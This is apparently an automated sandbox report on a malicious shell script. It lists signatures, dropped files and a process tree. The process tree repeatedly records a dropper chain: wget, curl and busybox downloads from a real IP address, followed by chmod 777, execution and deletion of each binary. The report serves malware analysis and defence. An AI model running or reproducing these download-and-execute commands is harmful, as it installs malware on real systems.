Malware Analysis Report

2025-04-03 19:36

Sample ID 241028-cjjanavpg1
Target 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
SHA256 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24

Threat Level: Shows suspicious behavior

The file 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

21s

Max time network

129s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

